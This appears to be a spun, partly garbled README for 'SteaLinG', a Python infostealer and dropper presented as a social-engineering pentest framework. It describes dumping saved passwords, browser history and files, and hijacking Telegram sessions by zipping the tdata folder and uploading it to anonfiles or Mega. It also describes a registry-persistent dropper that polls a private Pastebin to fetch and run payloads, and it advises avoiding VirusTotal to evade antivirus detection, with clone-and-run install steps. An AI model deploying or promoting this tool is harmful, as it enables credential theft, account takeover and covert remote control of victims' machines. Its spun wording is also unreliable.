The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you’ll be able to add it to the sufferer’s machine and run it
disclaimers:
That is just for testing functions and might solely be used the place strict consent has been given. Don’t use this for unlawful functions
How can I profit from this undertaking?
- you need to use it

- for builders
you’ll be able to learn the supply code and attempt to perceive make a undertaking like this
Options
module | Quick description |
---|---|
Dump password | steal All passwords saved , add file a passwords saved to mega |
Dump Historical past | dump browser historical past |
dump recordsdata | Steal recordsdata from the exhausting drive with the extension you need |
New options
module | Quick description |
---|---|
1-Telegram Session Hijack | Telegram session hijacker |
- The way it works ? The recording session in Telegram is saved regionally on this specific path
C:Customers<laptop title >AppDataRoamingTelegram Desktop
within the ‘tedata’ folder
C:
└── Customers
├── .AppData
│  └── Roaming
│  └── TelegramDesktop
│  └── tdata
After getting moved this folder with all its contents in your machine in the identical path, you then do what’s going to occur for it’s that easy The instrument does all this, all it’s important to do is give it your token on the positioning https://anonfiles.com/
Step one is to go to the trail the place the tdata file is situated, after which convert it to a zipper file. After all, if the Telegram was working, this could not occur. If there was any error, it signifies that the Telegram is open, so I’d do the kill processes. antivirus You will note that that is malicious conduct, so I prevented this half in any respect by the try to besides within the code The title of the archive file is used within the title of the machine of your sufferer, as a result of in case you have a couple of, I imply, after that, you’ll put up request for the zipfile on the anonfiles web site utilizing the API key or the token of your account on the positioning. On it, you will see your token Simply that, instructor, and it’s not uncovered from any AV
- What necessities does he want from you?
- And the way does it work?? Necessities The very first thing it asks you is the
URL
of the virus or no matter you need to obtain to the sufferer’s machine, however remember that theURL have to be direct
, which means that it have to be the tip Its Yama.exe or .png,
no matter is vital is that or not it’s a hyperlink that ends with a backstamp The second factor is to take the API Kay from you, and you’ll reply it as properly. Both you register, click on on the phrase API, you will see it, and you’ll take the username and password So how does it work?Â
The very first thing is to create a paste on the positioning and make it non-public Then it provides the url you gave it after which it provides you the exe file, its perform is that when it really works on any machine it begins including itself to Registry machine in two other ways It begins to open pastebin and inserts the particular paste you created, takes the paste url, downloads its content material and runs And you may enter the url at any time and put one other url. It is extremely regular as a result of the dropper goes each 10 minutes. Checks the URL. If it finds it, it modifications it, downloads its content material, downloads it, and connects to search out it. You do not do something, and so, each 10 minutes, you’ll be able to actually do it, you’ll be able to entry your machine from wherever
3- Linux help
4-Now you can select between Mega or Pastebin
Necessities
- python >= 3.8 ++ Obtain Python
- os : Home windows
- os : Linux
Set up to Home windows:
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip set up -r necessities.txt
python SteaLinG.py
Set up to Linux
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py
warning:
* Do not Add in VirusTotal.com Bcz This instrument is not going to work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Once more Do not be an Fool!
AV detection
Media